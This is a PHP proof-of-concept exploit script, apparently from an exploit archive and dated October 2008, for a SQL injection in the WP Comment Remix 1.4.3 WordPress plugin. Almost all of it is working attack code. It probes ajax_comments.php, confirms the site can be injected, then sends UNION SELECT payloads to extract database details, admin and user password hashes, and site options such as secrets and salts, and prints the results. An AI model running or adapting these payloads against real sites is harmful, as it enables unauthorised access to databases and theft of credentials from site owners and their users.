|
<?php
/**
* WP Comment Remix 1.4.3 SQL Injection
* Proof of Concept
* By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>
*
* Advisory:
* http://chxsecurity.org/advisories/adv-3-full.txt
*
* PoC Mirror:
* http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip
*
* Attention:
* This is a Proof-of-Concept it was never intended to be fully functional
*
* Notes:
* Uses cURL
*/
// Script Header
function head() {
print "\n WP Comment Remix 1.4.3 SQL Injection";
print "\n By g30rg3_x <g30rg3x_at_chxsecurity_dot_org>";
print "\n ------------------------------------------------";
print "\n This is a Proof-of-Concept it was never intended to be fully functional\n";
}
// Usage Information
function usage() {
global $argv;
head();
print "\n Usage: php {$argv[0]} <host> <path> <information> <table-prefix>\n";
print "\n <host>: Hostname or IP Address";
print "\n <path>: Path to WordPress (Defaults to: /)";
print "\n <information>: Information to Extract (Defaults to: relevant)";
print "\n dbinfo = Extract MySQL Current User, Database and Version";
print "\n admins = Extract Only Admins (users with level 10)";
print "\n users = Extract All Users (includes admins)";
print "\n options = Extract Relevant Options like active_plugins, secret, ...";
print "\n alloptions = Extrac All Options (Huge data would be directly printed out!)";
print "\n relevant = dbinfo + admins + options";
print "\n all = dbinfo + users + alloptions";
print "\n <table-prefix>: WordPress Tables Prefix (Defaults to: wp_)\n";
print "\n Examples:";
print "\n php {$argv[0]} foo.bar";
print "\n php {$argv[0]} foo.bar /wordpress/";
print "\n php {$argv[0]} foo.bar /wordpress/ all foo_";
print "\n";
exit();
}
// cURL HTTP GET
function GET($url) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Connection: Close'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'WP-Comment-Remix 1.4.3 SQL Injection Proof-of-Concept');
$result = curl_exec($ch);
curl_close($ch);
if ( preg_match('%HTTP/[0-9.x]+ 200 OK%', $result) )
return $result;
else
return false;
}
// Obtain Database Information
function obtainDBInfo() {
global $prefix, $url;
$injection = '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,user(),0x7D44427B,database(),0x7D76657273696F6E7B,version(),0x7D),10,11,12,13,14,15--';
$result = GET($url . $injection);
preg_match_all('/user\{(?P<user>.+)\}DB\{(?P<DB>.+)\}version\{(?P<version>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
$db['user'] = $captured['user'][0];
$db['name'] = $captured['DB'][0];
$db['version'] = $captured['version'][0];
return $db;
}
// Obtain WordPress Users Information
function obtainUsersInfo($all = false) {
global $prefix, $url;
$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(0x757365727B,{$prefix}users.user_login,0x7D706173737B,{$prefix}users.user_pass,0x7D),10,11,12,13,14,15/**/FROM/**/{$prefix}users" . ( $all ? '' : ",{$prefix}usermeta/**/WHERE/**/{$prefix}users.ID={$prefix}usermeta.user_id/**/AND/**/{$prefix}usermeta.meta_key/**/REGEXP/**/0x757365725F6C6576656C/**/AND/**/{$prefix}usermeta.meta_value=10" ) . '--';
$result = GET($url . $injection);
preg_match_all('/user\{(?P<user>.+)\}pass\{(?P<pass>.+)\}/', $result, $captured, PREG_PATTERN_ORDER);
for( $i = 0; $i < count($captured['user']); $i++ )
$users[$captured['user'][$i]] = $captured['pass'][$i];
return $users;
}
// Obtain WordPress Options Information
function obtainOptionsInfo($all = false) {
global $prefix, $url;
$injection = "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,CONCAT(option_name,0x7B7C,option_value,0x7C7D),10,11,12,13,14,15/**/FROM/**/{$prefix}options" . ( $all ? '' : '/**/WHERE/**/option_name/**/REGEXP/**/0x7369746575726C7C6C6F67696E7C757365727C706173737C617574687C7365637265747C73616C747C6163746976655F706C7567696E737C73656564' ) . '--';
$result = GET($url . $injection);
preg_match_all('%<p>(?P<name>.+)\{\|(?P<value>.+)\|\}</p>%', $result, $captured, PREG_PATTERN_ORDER);
for( $i = 0; $i < count($captured['name']); $i++ )
$options[$captured['name'][$i]] = $captured['value'][$i];
return $options;
}
// Set no time limit (only if safe mode is off)
if ( !ini_get('safe_mode') )
set_time_limit(0);
// Print usage if there is no host
if ( !isset($argv[1]) )
usage();
// Header, Arguments and Generate URL
head();
$host = $argv[1];
$path = isset($argv[2]) ? $argv[2] : '/';
$info = isset($argv[3]) ? $argv[3] : 'relevant';
$prefix = isset($argv[4]) ? $argv[4] : 'wp_';
$url = 'http://' . $host . $path . 'wp-content/plugins/wp-comment-remix/ajax_comments.php?p=0';
// Check if we can reach "ajax_comments.php"
print "\n Does ajax_comments.php exist? ... ";
$result = GET($url);
if ( !$result ) {
print "No";
print "\n -----------------------------------------------------------";
print "\n Seems that the site does not have WP Comment Remix installed";
print "\n OR the path you proportionate is incorrect.";
print "\n Please review your arguments and try again.\n";
exit();
}
print 'Yes';
// Check if is it possible to inject...
// ToDo: Some WordPress installations return more than 15 columns (this is caused by some plugins that alter
// the comments table structure and don't revert back this change) so this injection may fail A LOT in a non-default
// enviroment (ie. sites with many plugins), so if you REALLY want this PoC to be more "functional" then improve
// this part of the PoC; it was never my intention to deliver a "fully functional" Proof-of-Concept.
print "\n Can we Inject SQL Code? ... ";
$result = GET($url . '/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--');
if ( preg_match('/There are no comments for this post/', $result) ) {
print "No";
print "\n --------------------------------------";
print "\n Seems that the host is already patched.\n";
exit();
}
print 'Yes';
// Check table prefix but don't check if the user selected to obtain database information.
if ( $info != 'dbinfo') {
print "\n Is \"{$prefix}\" the table prefix? ... ";
$result = GET($url . "/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/{$prefix}users--");
if ( preg_match('/There are no comments for this post/', $result) ) {
print "No";
print "\n ------------------------------------------------";
print "\n Seems that the table prefix \"{$prefix}\" is incorrect.";
print "\n But this time we are not exiting, cause we can still extract";
print "\n the database information, so m just going to change your choice";
print "\n to dbinfo so you can still get that valuable information.";
print "\n ------------------------------------------------\n";
$info = 'dbinfo';
} else {
print 'Yes';
}
}
// Now is time to inject
print "\n\n Seems that everything is fine so now it's super fun time :P...";
switch($info) {
case 'all':
$db = obtainDBInfo();
$users = obtainUsersInfo(true);
$options = obtainOptionsInfo(true);
break;
case 'relevant':
$db = obtainDBInfo();
$users = obtainUsersInfo();
$options = obtainOptionsInfo();
break;
case 'dbinfo':
$db = obtainDBInfo();
break;
case 'admins':
$users = obtainUsersInfo();
break;
case 'users':
$users = obtainUsersInfo(true);
break;
case 'options':
$options = obtainOptionsInfo();
break;
case 'alloptions':
$options = obtainOptionsInfo(true);
break;
}
/* It's Show Time */
// Database Information
if ( !empty($db) ) {
print "\n\n Database Information";
print "\n ---------------------";
print "\n MySQL User: {$db['user']}";
print "\n MySQL Version: {$db['version']}";
print "\n MySQL Database Name: {$db['name']}";
}
// Users Information
if ( !empty($users) ) {
print "\n\n Users";
print "\n ---------";
foreach( (array) $users as $user => $pass ) {
print "\n Username: {$user}";
print "\n Password: {$pass} " . ( strlen($pass) <= 32 ? '(MD5)' : '(Passhash)' );
print "\n ---------";
}
}
// Options Information
if ( !empty($options) ) {
print "\n\n Options";
print "\n ---------";
foreach( (array) $options as $name => $value ) {
print "\n Name: {$name}";
print "\n Value: {$value}";
print "\n ---------";
}
}
// Good Bye =)
print "\n\n Have Fun! =)\n";
?>
# [2008-10-14]
|